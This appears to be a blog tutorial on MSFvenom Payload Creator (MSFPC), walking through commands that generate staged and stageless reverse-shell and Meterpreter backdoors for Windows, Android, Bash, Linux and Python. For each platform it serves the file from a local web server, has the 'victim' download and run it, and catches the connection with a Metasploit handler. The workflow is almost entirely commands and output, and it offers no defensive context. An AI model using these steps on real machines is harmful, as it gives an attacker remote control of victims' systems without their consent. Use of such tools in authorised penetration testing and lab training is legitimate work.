Hello Friends!!
As you all are aware of MSFvenom-A tool in Kali Linux for
generating payload, is also available as MSFvenom Payload Creator (MSFPC) for
generating various "basic" Meterpreter
payloads via msfvenom. It is fully automating msfvenom
& Metasploit is the end goal.
MSFvenom Payload
Creator (MSFPC) is a wrapper to generate multiple types of payloads, based
on user’s choice. The idea is to be as simple
as possible (only requiring one input)
to produce their payload.
Author:
g0tmi1k
SYNTAX
msfpc
() () () ()
() ()
() ()
Create a
Payload with Interactive IP Mode
Let’s create the payload for Windows platform with the
help of following command
msfpc windows
When you will enter above command it will automatically confirm
the interface:
Which interface
should be used?
eth0, lo wan
We press 1 for
eth0 and then it will start
generating payload and as result give us following:
1.
Location
of MSF handler file and windows meterpreter created.
2.
Command to
be run to start multi handler automatically within metasploit framework.
3.
Command
for file transfer through web server.
Basically the msfpc is design to reduce the user’s effort in
generating payload of various platforms with different-different format of
file. So when you will type “msfpc”
it will display all types of platform and generate a specific format of file likewise.
Syntax: msfpc
Windows Payload
If
you want to generate a payload to get meterpreter session victim’s machine which
operates on Windows, then all you need to do is type following:
msfpc windows 192.168.1.109
1234
If you will not mention IP, it will automatically ask to
choose interface as discussed above and choose 443 as default lport. It creates
a malicious backdoor in the .exe format
for 32-bit architecture. Then it will start generating the payload and as
result give us details following details.
·
Location of MSF handler file and windows
meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'
·
command to be run to start multi handler
automatically: msfconsole -q -r
'/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
·
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and
web server for file transfer.
msfconsole -q -r
'/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080
python2 -m SimpleHTTPServer 8080
When victim will browse the following URL where it will ask
to download and run the .exe file
that will provide meterpreter session to the attacker.
http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe
Conclusion: Earlier
the attackers were using manual method to generate a payload
via msfvenom command and then use Metasploit module
“multi/handler” to access the reverse connection
via meterpreter session and this technique was quite
successfully approach to compromise a victim’s machine although took
much time. But same approach is applicable with the help of MSFPC for
generating various "basic" Meterpreter payloads via msfvenom.
Android
Payload
If you want to generate a payload to get meterpreter session
victim’s machine which operates on Android, then all you need to do is type
following:
msfpc apk
192.168.1.109 1234
It creates a malicious backdoor in the .apk format. Then it will start
generating the payload and as result give us following details.
·
Location of MSF handler file and android
meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'
·
Command to be run to start multi handler
automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
·
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and
web server for file transfer.
msfconsole -q -r
'/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080
python2 -m SimpleHTTPServer 8080
When victim will browse the following URL where it will
ask to install the application and run the .apk
file that will provide meterpreter session to the attacker.
http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk
Hence you can observe as said above, we have meterpreter
session of target’s machine.
BASH
The pro above MSFPC is that it reduces the stress to remember the format for
each platform, all we need to do is just follow the above declare syntax
and the rest will
be managed by
MSFPC automatically. Suppose I want to create a payload for Bash platform, and then it will take a few minutes in MSFPC to generate a bash
payload.
msfpc bash
192.168.1.109 1234
It creates a malicious backdoor in the .sh format. Then it will start
generating the payload and as result give us following:
·
Location of MSF handler file and bash meterpreter
created: '/root/bash-shell-staged-reverse-tcp-1234.sh.'
·
Command to be run to start multi handler
automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
·
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and
web server for file transfer.
msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080
python2 -m SimpleHTTPServer 8080
When victim will browse the following URL where it will
ask to install the script and once the target run the bash script with full
permission, it will give command shell.
http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777
bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh
Hence you can observe as said above, we have command shell
of target’s machine and with the help of the following command we have upgraded
it into meterpreter shell.
sessions -u 1
Linux
If you want to generate a payload to get meterpreter session
victim’s machine which operates on Linux, then all you need to do is type
following:
msfpc linux
192.168.1.109 4444
It creates a malicious backdoor in the .elf format. Then it will start
generating the payload and as result give us following details:
·
Location of MSF handler file and Linux
shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf
·
Command to be run to start multi handler
automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
·
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and
web server for file transfer.
msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080
python2 -m SimpleHTTPServer 8080
When victim will browse the following URL where it will
ask to install the application and once the target run the .elf file with full
permission, it will give command shell.
http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf
Hence you can observe as said above, we have command shell
of target’s machine and with the help of the following command we have upgraded
it into meterpreter shell.
sessions -u 1
Python
If you want to generate a payload to get meterpreter session
victim’s machine which operates on Python, then all you need to do is type
following:
msfpc python
192.168.1.109 5555
It creates a malicious backdoor in the .py format. Then it will start
generating the payload and as result give us following detaisl:
Location of MSF handler file and python meterpreter
created: '/root/python-meterpreter-staged-reverse_tcp-5555.py
Command to be run to start multi handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and
web server for file transfer.
msfconsole -q -r
'/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080
python2 -m SimpleHTTPServer 8080
When victim will browse the following URL where it will
ask to install the script and once the target run the python script, it will
give meterpreter session.
http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py
Hence you can observe as said above, we have meterpreter
session of target’s machine
Batch
(Generates all Possible Combination Payloads)
Batch is most
significant Mode as it generate as much as possible combination of payload. If
we want to create all payloads which can give meterpreter session then we can use the following command in that
situation.
msfpc msf batch eth0
In the given below command you can observe here it has
generated all possible types payload which can give meterpreter sessions.
Although the rest technique is as above to execute the payload and get reverse
connection.
If we want to create all payloads which can give command shell session of the target’s
machine then we can use the following command in that situation.
msfpc cmd batch eth0
In the given below command you can observe here it has
generated all possible types payload which can give command shell.
Loop
(Generates One payload for Each Platform)
Loop is also most significant mode as it generates on of
each type of payload with their default values. Hence by default will generate
a payload to provide meterpreter session
rather than command shell session.
msfpc verbose loop eth0
In the given below command you can observe here it has
generated all possible types payload for each platform which can give
meterpreter sessions. Although the rest technique is as above to execute the
payload and get reverse connection.
Generating
Stageless Payload
As we all know there are two types of payloads i.e. stag
and stageless and by default it creates a stage payload. If you want to create
a stageless payload then you can go with the following command to generate
stageless payload for command shell session or meterpreter session.
msfpc stagless cmd
window 192.168.1.109
msfpc stagless
msf window 192.168.1.109
The rest technique is as above to execute the payload and
get reverse connection.
0 comments:
Post a Comment